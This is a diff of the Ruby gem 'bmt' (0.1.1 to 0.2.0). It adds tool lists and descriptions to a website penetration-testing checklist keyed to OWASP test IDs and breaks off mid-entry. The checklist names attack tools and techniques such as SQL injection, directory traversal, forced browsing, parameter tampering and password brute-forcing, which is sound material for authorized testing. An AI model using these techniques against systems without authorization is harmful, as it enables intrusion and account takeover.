bmt 0.1.1 → 0.2.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/lib/bmt/item.rb +3 -1
- data/lib/bmt/version.rb +1 -1
- data/lib/data/0.1/mappings/templates.json +17 -0
- data/lib/data/0.1/mappings/templates.schema.json +62 -0
- data/lib/data/0.1/methodologies/template.json +18 -6
- data/lib/data/0.1/methodologies/website_testing.json +301 -101
- data/lib/data/0.1/schema.json +7 -1
- metadata +4 -2
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: '040904fc39790bbaa2e13d8fcb1894d0bdb7f380ce08a7a776c375be21ba47d7'
|
|
4
|
+
data.tar.gz: 7585f36949be01298afb26f799a0bcf991b7b699b8619a482e32289f3626d2c0
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: f266fa46ced81e902c2be218b40b06cfcf4dc008a17446e0fbd795b964a11662cab74454c20d79473ebe35b7b2201cf6c84b2808d2a65d30fc4e19ccc541b2e6
|
|
7
|
+
data.tar.gz: 9492beea14f985570dc4a002f851ea4fa976274497032de91c1f3ddff6af65b6fa2d87d80a343c141b316415da19abd12071d2b6bdccff51fe81de09abb0b037
|
data/lib/bmt/item.rb
CHANGED
|
@@ -1,12 +1,14 @@
|
|
|
1
1
|
module BMT
|
|
2
2
|
class Item
|
|
3
|
-
attr_reader :key, :title, :description, :vrt_category, :step
|
|
3
|
+
attr_reader :key, :title, :caption, :description, :tools, :vrt_category, :step
|
|
4
4
|
|
|
5
5
|
def initialize(step:, attributes:)
|
|
6
6
|
@step = step
|
|
7
7
|
@key = attributes['key']
|
|
8
8
|
@title = attributes['title']
|
|
9
|
+
@caption = attributes['caption']
|
|
9
10
|
@description = attributes['description']
|
|
11
|
+
@tools = attributes['tools']
|
|
10
12
|
@vrt_category = attributes['vrt_category']
|
|
11
13
|
end
|
|
12
14
|
end
|
data/lib/bmt/version.rb
CHANGED
|
@@ -0,0 +1,17 @@
|
|
|
1
|
+
{
|
|
2
|
+
"metadata": {
|
|
3
|
+
"title": "Methodology Taxonomy Template Mapping"
|
|
4
|
+
},
|
|
5
|
+
"content": [
|
|
6
|
+
{
|
|
7
|
+
"methodology": "website_testing",
|
|
8
|
+
"children": [
|
|
9
|
+
{
|
|
10
|
+
"key": "information",
|
|
11
|
+
"attribute": "notes",
|
|
12
|
+
"template": "information.md"
|
|
13
|
+
}
|
|
14
|
+
]
|
|
15
|
+
}
|
|
16
|
+
]
|
|
17
|
+
}
|
|
@@ -0,0 +1,62 @@
|
|
|
1
|
+
{
|
|
2
|
+
"$schema": "http://json-schema.org/draft-07/schema#",
|
|
3
|
+
"title": "Methodology Taxonomy Mapping",
|
|
4
|
+
"description": "Mapping to methodology taxonomy",
|
|
5
|
+
"definitions": {
|
|
6
|
+
"MappingMetadata": {
|
|
7
|
+
"type": "object",
|
|
8
|
+
"properties": {
|
|
9
|
+
"title": {
|
|
10
|
+
"type": "string",
|
|
11
|
+
"pattern": "^[ a-zA-Z0-9\\-+()\/,.<]*$"
|
|
12
|
+
}
|
|
13
|
+
},
|
|
14
|
+
"required": ["title"]
|
|
15
|
+
},
|
|
16
|
+
"BMTKey": { "type": "string", "pattern": "^[a-z_]*$" },
|
|
17
|
+
"Attribute": { "type": "string", "pattern": "^[a-z_]*$" },
|
|
18
|
+
"Template": { "type": "string", "pattern": "[a-z_.]*$" },
|
|
19
|
+
"Mapping": {
|
|
20
|
+
"type": "object",
|
|
21
|
+
"properties": {
|
|
22
|
+
"key": { "$ref": "#/definitions/BMTKey" },
|
|
23
|
+
"attribute": { "$ref": "#/definitions/Attribute" },
|
|
24
|
+
"template" : { "$ref": "#/definitions/Template" }
|
|
25
|
+
},
|
|
26
|
+
"required": ["key", "attribute", "template"],
|
|
27
|
+
"additionalProperties": false
|
|
28
|
+
},
|
|
29
|
+
"MappingParent": {
|
|
30
|
+
"type": "object",
|
|
31
|
+
"properties": {
|
|
32
|
+
"methodology": { "$ref": "#/definitions/BMTKey" },
|
|
33
|
+
"children": {
|
|
34
|
+
"type": "array",
|
|
35
|
+
"items" : {
|
|
36
|
+
"anyOf": [
|
|
37
|
+
{ "$ref": "#/definitions/Mapping" }
|
|
38
|
+
]
|
|
39
|
+
}
|
|
40
|
+
}
|
|
41
|
+
},
|
|
42
|
+
"required": ["methodology", "children"],
|
|
43
|
+
"additionalProperties": false
|
|
44
|
+
}
|
|
45
|
+
},
|
|
46
|
+
"type": "object",
|
|
47
|
+
"required": ["metadata", "content"],
|
|
48
|
+
"properties": {
|
|
49
|
+
"metadata": {
|
|
50
|
+
"$ref": "#/definitions/MappingMetadata"
|
|
51
|
+
},
|
|
52
|
+
"content": {
|
|
53
|
+
"type": "array",
|
|
54
|
+
"items" : {
|
|
55
|
+
"anyOf": [
|
|
56
|
+
{ "$ref": "#/definitions/MappingParent" },
|
|
57
|
+
{ "$ref": "#/definitions/Mapping" }
|
|
58
|
+
]
|
|
59
|
+
}
|
|
60
|
+
}
|
|
61
|
+
}
|
|
62
|
+
}
|
|
@@ -15,18 +15,24 @@
|
|
|
15
15
|
{
|
|
16
16
|
"key": "marsupial",
|
|
17
17
|
"title": "Is it a marsupial?",
|
|
18
|
-
"
|
|
18
|
+
"caption": "Marsupials are obviously mammalian and have a pouch on their underside",
|
|
19
|
+
"description": "Check for the pouch",
|
|
20
|
+
"tools": "Eyes",
|
|
19
21
|
"vrt_category": "insecure_data_storage"
|
|
20
22
|
},
|
|
21
23
|
{
|
|
22
24
|
"key": "diet",
|
|
23
25
|
"title": "Make sure it eats eucalyptus",
|
|
24
|
-
"
|
|
26
|
+
"caption": "Almost no other animal can eat eucalyptus leaves, so this is a good diagnostic",
|
|
27
|
+
"description": "Take some eucalyptus branches, remove some leaves and try to feed the alleged koala",
|
|
28
|
+
"tools": "Leaves and Branches"
|
|
25
29
|
},
|
|
26
30
|
{
|
|
27
31
|
"key": "behavior",
|
|
28
32
|
"title": "Does it sleep the whole day?",
|
|
29
|
-
"
|
|
33
|
+
"caption": "Usually sleeps on trees",
|
|
34
|
+
"description": "The alleged Koala should sleep the whole day if provided a tree.",
|
|
35
|
+
"tools": "Trees, Dawn"
|
|
30
36
|
}
|
|
31
37
|
]
|
|
32
38
|
},
|
|
@@ -38,17 +44,23 @@
|
|
|
38
44
|
{
|
|
39
45
|
"key": "marsupial",
|
|
40
46
|
"title": "Is it a marsupial?",
|
|
41
|
-
"
|
|
47
|
+
"caption": "Marsupials are obviously mammalian but possess a pouch on their underside",
|
|
48
|
+
"description": "Check for the pouch",
|
|
49
|
+
"tools": "Eyes"
|
|
42
50
|
},
|
|
43
51
|
{
|
|
44
52
|
"key": "tail",
|
|
45
53
|
"title": "Does it have a long tail?",
|
|
46
|
-
"
|
|
54
|
+
"caption": "Kangaroos use their thick tail as a balance when jumping, and can use it as a support to rear up on when kicking",
|
|
55
|
+
"description": "Use the meter to measure the tail, it should be pretty long",
|
|
56
|
+
"tools": "Meter"
|
|
47
57
|
},
|
|
48
58
|
{
|
|
49
59
|
"key": "jump",
|
|
50
60
|
"title": "Does it jump around?",
|
|
51
|
-
"
|
|
61
|
+
"caption": "Over very short distances kangaroos will use their forepaws to balance on the ground and swing their legs forward. For longer distance movement, their jumping locomotion is unmistakeable.",
|
|
62
|
+
"description": "Free the Kangaroo in a field and notice that it will start jumping. Bonus point to use a Trampoline.",
|
|
63
|
+
"tools": "Field, Trampoline"
|
|
52
64
|
}
|
|
53
65
|
]
|
|
54
66
|
}
|
|
@@ -15,55 +15,75 @@
|
|
|
15
15
|
{
|
|
16
16
|
"key": "search_engine_discovery_and_reconnaissance",
|
|
17
17
|
"title": "Conduct Search Engine Discovery and Reconnaissance for Information Leakage",
|
|
18
|
-
"
|
|
18
|
+
"caption": "OTG-INFO-001, WAHHM - Recon and Analysis",
|
|
19
|
+
"description": "Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.",
|
|
20
|
+
"tools": "Google Hacking, Sitedigger, Shodan, FOCA, Punkspider",
|
|
19
21
|
"vrt_category": "sensitive_data_exposure"
|
|
20
22
|
},
|
|
21
23
|
{
|
|
22
24
|
"key": "fingerprint",
|
|
23
25
|
"title": "Fingerprint Web Server",
|
|
24
|
-
"
|
|
26
|
+
"caption": "OTG-INFO-002, WAHHM - Recon and Analysis",
|
|
27
|
+
"description": "Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using 'HTTP header field ordering' and 'Malformed requests test.'",
|
|
28
|
+
"tools": "Httprint, Httprecon, Desenmascarame",
|
|
25
29
|
"vrt_category": "server_security_misconfiguration"
|
|
26
30
|
},
|
|
27
31
|
{
|
|
28
32
|
"key": "webserver_metafiles",
|
|
29
33
|
"title": "Review Webserver Metafiles for Information Leakage",
|
|
30
|
-
"
|
|
34
|
+
"caption": "OTG-INFO-003, WAHHM - Recon and Analysis",
|
|
35
|
+
"description": "Analyze robots.txt and identify <META> Tags from website.",
|
|
36
|
+
"tools": "Browser, curl, wget"
|
|
31
37
|
},
|
|
32
38
|
{
|
|
33
39
|
"key": "enumerate_applications",
|
|
34
40
|
"title": "Enumerate Applications on Webserver",
|
|
35
|
-
"
|
|
41
|
+
"caption": "if in scope OTG-INFO-004, WAHHM - Recon and Analysis",
|
|
42
|
+
"description": "Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers",
|
|
43
|
+
"tools": "Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue"
|
|
36
44
|
},
|
|
37
45
|
{
|
|
38
46
|
"key": "webpage_comments_and_metadata",
|
|
39
47
|
"title": "Review Webpage Comments and Metadata for Information Leakage",
|
|
40
|
-
"
|
|
48
|
+
"caption": "OTG-INFO-005, WAHHM - Recon and Analysis",
|
|
49
|
+
"description": "Find sensitive information from webpage comments and Metadata on source code.",
|
|
50
|
+
"tools": "Browser, curl, wget",
|
|
41
51
|
"vrt_category": "sensitive_data_exposure"
|
|
42
52
|
},
|
|
43
53
|
{
|
|
44
54
|
"key": "application_entry_points",
|
|
45
55
|
"title": "Identify application entry points",
|
|
46
|
-
"
|
|
56
|
+
"caption": "OTG-INFO-006, WAHHM - Recon and Analysis",
|
|
57
|
+
"description": "Identify from hidden fields, parameters, methods HTTP header analysis",
|
|
58
|
+
"tools": "Burp proxy, ZAP, Tamper data"
|
|
47
59
|
},
|
|
48
60
|
{
|
|
49
61
|
"key": "execution_paths",
|
|
50
62
|
"title": "Map execution paths through application",
|
|
51
|
-
"
|
|
63
|
+
"caption": "OTG-INFO-007, WAHHM - Recon and Analysis",
|
|
64
|
+
"description": "Map the target application and understand the principal workflows.",
|
|
65
|
+
"tools": "Burp proxy, ZAP"
|
|
52
66
|
},
|
|
53
67
|
{
|
|
54
68
|
"key": "fingerprint_webapp_framework",
|
|
55
69
|
"title": "Fingerprint Web Application Framework",
|
|
56
|
-
"
|
|
70
|
+
"caption": "OTG-INFO-008, WAHHM - Recon and Analysis",
|
|
71
|
+
"description": "Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.",
|
|
72
|
+
"tools": "Whatweb, BlindElephant, Wappalyzer"
|
|
57
73
|
},
|
|
58
74
|
{
|
|
59
75
|
"key": "fingerprint_webapp",
|
|
60
76
|
"title": "Fingerprint Web Application",
|
|
61
|
-
"
|
|
77
|
+
"caption": "OTG-INFO-009, WAHHM - Recon and Analysis",
|
|
78
|
+
"description": "Identify the web application and version to determine known vulnerabilities and the appropriate exploits.",
|
|
79
|
+
"tools": "Whatweb, BlindElephant, Wappalyzer"
|
|
62
80
|
},
|
|
63
81
|
{
|
|
64
82
|
"key": "application_architecture",
|
|
65
83
|
"title": "Map Application Architecture",
|
|
66
|
-
"
|
|
84
|
+
"caption": "OTG-INFO-010, WAHHM - Recon and Analysis",
|
|
85
|
+
"description": "Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database",
|
|
86
|
+
"tools": "Browser, curl, wget"
|
|
67
87
|
}
|
|
68
88
|
]
|
|
69
89
|
},
|
|
@@ -75,48 +95,64 @@
|
|
|
75
95
|
{
|
|
76
96
|
"key": "network_and_infrastructure",
|
|
77
97
|
"title": "Test Network/Infrastructure Configuration",
|
|
78
|
-
"
|
|
98
|
+
"caption": "OTG-CONFIG-001, WAHHM - Recon and Analysis, Assess Application Hosting",
|
|
99
|
+
"description": "Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.",
|
|
100
|
+
"tools": "Nessus",
|
|
79
101
|
"vrt_category": "server_security_misconfiguration"
|
|
80
102
|
},
|
|
81
103
|
{
|
|
82
104
|
"key": "application_platform",
|
|
83
105
|
"title": "Test Application Platform Configuration",
|
|
84
|
-
"
|
|
106
|
+
"caption": "OTG-CONFIG-002, WAHHM - Recon and Analysis",
|
|
107
|
+
"description": "Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.",
|
|
108
|
+
"tools": "Browser, Nikto",
|
|
85
109
|
"vrt_category": "server_security_misconfiguration"
|
|
86
110
|
},
|
|
87
111
|
{
|
|
88
112
|
"key": "file_extensions_handling",
|
|
89
113
|
"title": "Test File Extensions Handling for Sensitive Information",
|
|
90
|
-
"
|
|
114
|
+
"caption": "OTG-CONFIG-003, WAHHM - Recon and Analysis",
|
|
115
|
+
"description": "Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)",
|
|
116
|
+
"tools": "Browser, Nikto",
|
|
91
117
|
"vrt_category": "sensitive_data_exposure"
|
|
92
118
|
},
|
|
93
119
|
{
|
|
94
120
|
"key": "backup_and_unreferenced_files",
|
|
95
121
|
"title": "Backup and Unreferenced Files for Sensitive Information",
|
|
96
|
-
"
|
|
122
|
+
"caption": "OTG-CONFIG-004, WAHHM - Recon and Analysis",
|
|
123
|
+
"description": "Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename",
|
|
124
|
+
"tools": "Nessus, Nikto, Wikto",
|
|
97
125
|
"vrt_category": "sensitive_data_exposure"
|
|
98
126
|
},
|
|
99
127
|
{
|
|
100
128
|
"key": "admin_interfaces",
|
|
101
129
|
"title": "Enumerate Infrastructure and Application Admin Interfaces",
|
|
102
|
-
"
|
|
130
|
+
"caption": "OTG-CONFIG-005, WAHHM - Recon and Analysis",
|
|
131
|
+
"description": "Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)",
|
|
132
|
+
"tools": "Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner"
|
|
103
133
|
},
|
|
104
134
|
{
|
|
105
135
|
"key": "http_methods",
|
|
106
136
|
"title": "Test HTTP Methods",
|
|
107
|
-
"
|
|
137
|
+
"caption": "OTG-CONFIG-006, WAHHM - Test Handling of Access",
|
|
138
|
+
"description": "Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST",
|
|
139
|
+
"tools": "netcat, curl",
|
|
108
140
|
"vrt_category": "server_security_misconfiguration"
|
|
109
141
|
},
|
|
110
142
|
{
|
|
111
143
|
"key": "http_transport_security",
|
|
112
144
|
"title": "Test HTTP Strict Transport Security",
|
|
113
|
-
"
|
|
145
|
+
"caption": "OTG-CONFIG-007, WAHHM - Test Handling of Access",
|
|
146
|
+
"description": "Identify HSTS header on Web server through HTTP response header. curl -s -D- https://domain.com/ | grep Strict",
|
|
147
|
+
"tools": "Burp Proxy, ZAP, curl",
|
|
114
148
|
"vrt_category": "server_security_misconfiguration"
|
|
115
149
|
},
|
|
116
150
|
{
|
|
117
151
|
"key": "ria_cross_domain_policy",
|
|
118
152
|
"title": "Test RIA cross domain policy",
|
|
119
|
-
"
|
|
153
|
+
"caption": "OTG-CONFIG-008, WAHHM - Test Handling of Access",
|
|
154
|
+
"description": "Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.",
|
|
155
|
+
"tools": "Burp Proxy, ZAP, Nikto",
|
|
120
156
|
"vrt_category": "server_security_misconfiguration"
|
|
121
157
|
}
|
|
122
158
|
]
|
|
@@ -129,42 +165,56 @@
|
|
|
129
165
|
{
|
|
130
166
|
"key": "role_definition",
|
|
131
167
|
"title": "Test Role Definitions",
|
|
132
|
-
"
|
|
168
|
+
"caption": "OTG-IDENT-001, WAHHM - Test Handling of Access",
|
|
169
|
+
"description": "Validate the system roles defined within the application by creating a permission matrix.",
|
|
170
|
+
"tools": "Burp Proxy, ZAP",
|
|
133
171
|
"vrt_category": "broken_access_control"
|
|
134
172
|
},
|
|
135
173
|
{
|
|
136
174
|
"key": "user_registration",
|
|
137
175
|
"title": "Test User Registration Process",
|
|
138
|
-
"
|
|
176
|
+
"caption": "OTG-IDENT-002, WAHHM - Test Handling of Access",
|
|
177
|
+
"description": "Verify that the identity requirements for user registration are aligned with business and security requirements",
|
|
178
|
+
"tools": "Burp Proxy, ZAP",
|
|
139
179
|
"vrt_category": "server_security_misconfiguration"
|
|
140
180
|
},
|
|
141
181
|
{
|
|
142
182
|
"key": "account_provisioning",
|
|
143
183
|
"title": "Test Account Provisioning Process",
|
|
144
|
-
"
|
|
184
|
+
"caption": "OTG-IDENT-003, WAHHM - Test Handling of Access",
|
|
185
|
+
"description": "Determine which roles are able to provision users and what sort of accounts they can provision.",
|
|
186
|
+
"tools": "Burp Proxy, ZAP"
|
|
145
187
|
},
|
|
146
188
|
{
|
|
147
189
|
"key": "guessable_user_accounts",
|
|
148
190
|
"title": "Testing for Account Enumeration and Guessable User Account",
|
|
149
|
-
"
|
|
191
|
+
"caption": "OTG-IDENT-004, WAHHM - Test Handling of Access",
|
|
192
|
+
"description": "Generic login error statement check, return codes/parameter values, enumerate all possible valid user ids (Login system, Forgot password)",
|
|
193
|
+
"tools": "Browser, Burp Proxy, ZAP",
|
|
150
194
|
"vrt_category": "server_security_misconfiguration"
|
|
151
195
|
},
|
|
152
196
|
{
|
|
153
197
|
"key": "username_policy",
|
|
154
198
|
"title": "Testing for Weak or unenforced username policy",
|
|
155
|
-
"
|
|
199
|
+
"caption": "OTG-IDENT-005, WAHHM - Test Handling of Access",
|
|
200
|
+
"description": "User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed.",
|
|
201
|
+
"tools": "Browser, Burp Proxy, ZAP",
|
|
156
202
|
"vrt_category": "server_security_misconfiguration"
|
|
157
203
|
},
|
|
158
204
|
{
|
|
159
205
|
"key": "guest_accounts_permission",
|
|
160
206
|
"title": "Test Permissions of Guest/Training Accounts",
|
|
161
|
-
"
|
|
207
|
+
"caption": "OTG-IDENT-006, WAHHM - Test Handling of Access",
|
|
208
|
+
"description": "Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorization process required for access. Evaluate consistency between access policy and guest/training account access permissions.",
|
|
209
|
+
"tools": "Burp Proxy, ZAP",
|
|
162
210
|
"vrt_category": "server_security_misconfiguration"
|
|
163
211
|
},
|
|
164
212
|
{
|
|
165
213
|
"key": "account_suspension_resumption",
|
|
166
214
|
"title": "Test Account Suspension/Resumption Process",
|
|
167
|
-
"
|
|
215
|
+
"caption": "OTG-IDENT-007, WAHHM - Test Handling of Access",
|
|
216
|
+
"description": "Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.",
|
|
217
|
+
"tools": "Burp Proxy, ZAP",
|
|
168
218
|
"vrt_category": "server_security_misconfiguration"
|
|
169
219
|
}
|
|
170
220
|
]
|
|
@@ -177,61 +227,81 @@
|
|
|
177
227
|
{
|
|
178
228
|
"key": "encrypted_credentials",
|
|
179
229
|
"title": "Testing for Credentials Transported over an Encrypted Channel",
|
|
180
|
-
"
|
|
230
|
+
"caption": "OTG-AUTHN-001, WAHHM - Miscellaneous Tests",
|
|
231
|
+
"description": "Check the referrer whether it’s HTTP or HTTPs. Sending data through HTTP and HTTPS.",
|
|
232
|
+
"tools": "Burp Proxy, ZAP",
|
|
181
233
|
"vrt_category": "broken_authentication_and_session_management"
|
|
182
234
|
},
|
|
183
235
|
{
|
|
184
236
|
"key": "default_credentials",
|
|
185
237
|
"title": "Testing for default credentials",
|
|
186
|
-
"
|
|
238
|
+
"caption": "OTG-AUTHN-002, WAHHM - Test Handling of Access",
|
|
239
|
+
"description": "Testing for default credentials of common applications, Testing for default password of new accounts.",
|
|
240
|
+
"tools": "Burp Proxy, ZAP, Hydra",
|
|
187
241
|
"vrt_category": "server_security_misconfiguration"
|
|
188
242
|
},
|
|
189
243
|
{
|
|
190
244
|
"key": "lock_out_mechanism",
|
|
191
245
|
"title": "Testing for Weak lock out mechanism",
|
|
192
|
-
"
|
|
246
|
+
"caption": "OTG-AUTHN-003, WAHHM - Test Handling of Access",
|
|
247
|
+
"description": "Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.",
|
|
248
|
+
"tools": "Browser",
|
|
193
249
|
"vrt_category": "server_security_misconfiguration"
|
|
194
250
|
},
|
|
195
251
|
{
|
|
196
252
|
"key": "bypass_schema",
|
|
197
253
|
"title": "Testing for bypassing authentication schema",
|
|
198
|
-
"
|
|
254
|
+
"caption": "OTG-AUTHN-004, WAHHM - Test Handling of Access",
|
|
255
|
+
"description": "Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection",
|
|
256
|
+
"tools": "Burp Proxy, ZAP",
|
|
199
257
|
"vrt_category": "broken_authentication_and_session_management"
|
|
200
258
|
},
|
|
201
259
|
{
|
|
202
260
|
"key": "remember_password",
|
|
203
261
|
"title": "Test remember password functionality",
|
|
204
|
-
"
|
|
262
|
+
"caption": "OTG-AUTHN-005, WAHHM - Test Handling of Access",
|
|
263
|
+
"description": "Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?",
|
|
264
|
+
"tools": "Burp Proxy, ZAP",
|
|
205
265
|
"vrt_category": "broken_authentication_and_session_management"
|
|
206
266
|
},
|
|
207
267
|
{
|
|
208
268
|
"key": "browser_cache",
|
|
209
269
|
"title": "Testing for Browser cache weakness",
|
|
210
|
-
"
|
|
270
|
+
"caption": "OTG-AUTHN-006, WAHHM - Miscellaneous Tests",
|
|
271
|
+
"description": "Check browser history issues by clicking the 'Back' button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)",
|
|
272
|
+
"tools": "Burp Proxy, ZAP, Firefox add-on CacheViewer2",
|
|
211
273
|
"vrt_category": "server_security_misconfiguration"
|
|
212
274
|
},
|
|
213
275
|
{
|
|
214
276
|
"key": "password_policy",
|
|
215
277
|
"title": "Testing for Weak password policy",
|
|
216
|
-
"
|
|
278
|
+
"caption": "OTG-AUTHN-007, WAHHM - Test Handling of Access",
|
|
279
|
+
"description": "Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of Passwords.",
|
|
280
|
+
"tools": "Burp Proxy, ZAP, Hydra",
|
|
217
281
|
"vrt_category": "insufficient_security_configurability"
|
|
218
282
|
},
|
|
219
283
|
{
|
|
220
284
|
"key": "security_question",
|
|
221
285
|
"title": "Testing for Weak security question/answer",
|
|
222
|
-
"
|
|
286
|
+
"caption": "OTG-AUTHN-008, WAHHM - Test Handling of Access",
|
|
287
|
+
"description": "Testing for weak pre-generated questions, Testing for weak self-generated questions, Testing for brute-forcible answers (Unlimited attempts?)",
|
|
288
|
+
"tools": "Browser",
|
|
223
289
|
"vrt_category": "broken_authentication_and_session_management"
|
|
224
290
|
},
|
|
225
291
|
{
|
|
226
292
|
"key": "change_password",
|
|
227
293
|
"title": "Testing for weak password change or reset functionalities",
|
|
228
|
-
"
|
|
294
|
+
"caption": "OTG-AUTHN-009, WAHHM - Test Handling of Access",
|
|
295
|
+
"description": "Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?",
|
|
296
|
+
"tools": "Browser, Burp Proxy, ZAP",
|
|
229
297
|
"vrt_category": "broken_authentication_and_session_management"
|
|
230
298
|
},
|
|
231
299
|
{
|
|
232
300
|
"key": "alternative_channel",
|
|
233
301
|
"title": "Testing for Weaker authentication in alternative channel",
|
|
234
|
-
"
|
|
302
|
+
"caption": "OTG-AUTHN-010, WAHHM - Test Handling of Access",
|
|
303
|
+
"description": "Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)",
|
|
304
|
+
"tools": "Browser"
|
|
235
305
|
}
|
|
236
306
|
]
|
|
237
307
|
},
|
|
@@ -243,25 +313,33 @@
|
|
|
243
313
|
{
|
|
244
314
|
"key": "directory_traversal_and_file_include",
|
|
245
315
|
"title": "Testing Directory traversal/file include",
|
|
246
|
-
"
|
|
316
|
+
"caption": "OTG-AUTHZ-001, WAHHM - Test Handling of Input",
|
|
317
|
+
"description": "dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.",
|
|
318
|
+
"tools": "Burp Proxy, ZAP, Wfuzz",
|
|
247
319
|
"vrt_category": "server_side_injection"
|
|
248
320
|
},
|
|
249
321
|
{
|
|
250
322
|
"key": "bypass_schema",
|
|
251
323
|
"title": "Testing for bypassing authorization schema",
|
|
252
|
-
"
|
|
324
|
+
"caption": "OTG-AUTHZ-002, WAHHM - Test Handling of Access",
|
|
325
|
+
"description": "Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)",
|
|
326
|
+
"tools": "Burp Proxy (Authorize), ZAP",
|
|
253
327
|
"vrt_category": "broken_access_control"
|
|
254
328
|
},
|
|
255
329
|
{
|
|
256
330
|
"key": "privilege_escalation",
|
|
257
331
|
"title": "Testing for Privilege Escalation",
|
|
258
|
-
"
|
|
332
|
+
"caption": "OTG-AUTHZ-003, WAHHM - Test Handling of Access",
|
|
333
|
+
"description": "Testing for role/privilege manipulates the values of hidden variables. Change some param groupid=2 to groupid=1",
|
|
334
|
+
"tools": "Burp Proxy (Authorize), ZAP",
|
|
259
335
|
"vrt_category": "broken_authentication_and_session_management"
|
|
260
336
|
},
|
|
261
337
|
{
|
|
262
338
|
"key": "direct_object_reference",
|
|
263
339
|
"title": "Testing for Insecure Direct Object References",
|
|
264
|
-
"
|
|
340
|
+
"caption": "OTG-AUTHZ-004, WAHHM - Test Handling of Access",
|
|
341
|
+
"description": "Force changing parameter value (?invoice=123 -> ?invoice=456)",
|
|
342
|
+
"tools": "Burp Proxy (Authorize), ZAP",
|
|
265
343
|
"vrt_category": "broken_access_control"
|
|
266
344
|
}
|
|
267
345
|
]
|
|
@@ -274,49 +352,65 @@
|
|
|
274
352
|
{
|
|
275
353
|
"key": "bypass_schema",
|
|
276
354
|
"title": "Testing for Bypassing Session Management Schema",
|
|
277
|
-
"
|
|
355
|
+
"caption": "OTG-SESS-001, WAHHM - Test Handling of Access",
|
|
356
|
+
"description": "SessionID analysis prediction, unencrypted cookie transport, brute-force.",
|
|
357
|
+
"tools": "Burp Proxy, ForceSSL, ZAP, CookieDigger",
|
|
278
358
|
"vrt_category": "broken_authentication_and_session_management"
|
|
279
359
|
},
|
|
280
360
|
{
|
|
281
361
|
"key": "cookies",
|
|
282
362
|
"title": "Testing for Cookies attributes",
|
|
283
|
-
"
|
|
363
|
+
"caption": "OTG-SESS-002, WAHHM - Test Handling of Access",
|
|
364
|
+
"description": "Check HTTPOnly and Secure flag expiration, inspect for sensitive data.",
|
|
365
|
+
"tools": "Burp Proxy, ZAP",
|
|
284
366
|
"vrt_category": "server_security_misconfiguration"
|
|
285
367
|
},
|
|
286
368
|
{
|
|
287
369
|
"key": "fixation",
|
|
288
370
|
"title": "Testing for Session Fixation",
|
|
289
|
-
"
|
|
371
|
+
"caption": "OTG-SESS-003, WAHHM - Test Handling of Access",
|
|
372
|
+
"description": "The application doesn't renew the cookie after a successful user authentication.",
|
|
373
|
+
"tools": "Burp Proxy, ZAP",
|
|
290
374
|
"vrt_category": "broken_authentication_and_session_management"
|
|
291
375
|
},
|
|
292
376
|
{
|
|
293
377
|
"key": "exposed_variables",
|
|
294
378
|
"title": "Testing for Exposed Session Variables",
|
|
295
|
-
"
|
|
379
|
+
"caption": "OTG-SESS-004, WAHHM - Test Handling of Access",
|
|
380
|
+
"description": "Encryption & Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?",
|
|
381
|
+
"tools": "Burp Proxy, ZAP",
|
|
296
382
|
"vrt_category": "broken_authentication_and_session_management"
|
|
297
383
|
},
|
|
298
384
|
{
|
|
299
385
|
"key": "csrf",
|
|
300
386
|
"title": "Testing for Cross Site Request Forgery",
|
|
301
|
-
"
|
|
387
|
+
"caption": "OTG-SESS-005, WAHHM - Test Handling of Access",
|
|
388
|
+
"description": "URL analysis, Direct access to functions without any token.",
|
|
389
|
+
"tools": "Burp Proxy (csrf_token_detect), burpy, ZAP",
|
|
302
390
|
"vrt_category": "cross_site_request_forgery_csrf"
|
|
303
391
|
},
|
|
304
392
|
{
|
|
305
393
|
"key": "logout",
|
|
306
394
|
"title": "Testing for logout functionality",
|
|
307
|
-
"
|
|
395
|
+
"caption": "OTG-SESS-006, WAHHM - Test Handling of Access",
|
|
396
|
+
"description": "Check reuse session after logout both server-side and SSO.",
|
|
397
|
+
"tools": "Burp Proxy, ZAP",
|
|
308
398
|
"vrt_category": "broken_authentication_and_session_management"
|
|
309
399
|
},
|
|
310
400
|
{
|
|
311
401
|
"key": "timeout",
|
|
312
402
|
"title": "Test Session Timeout",
|
|
313
|
-
"
|
|
403
|
+
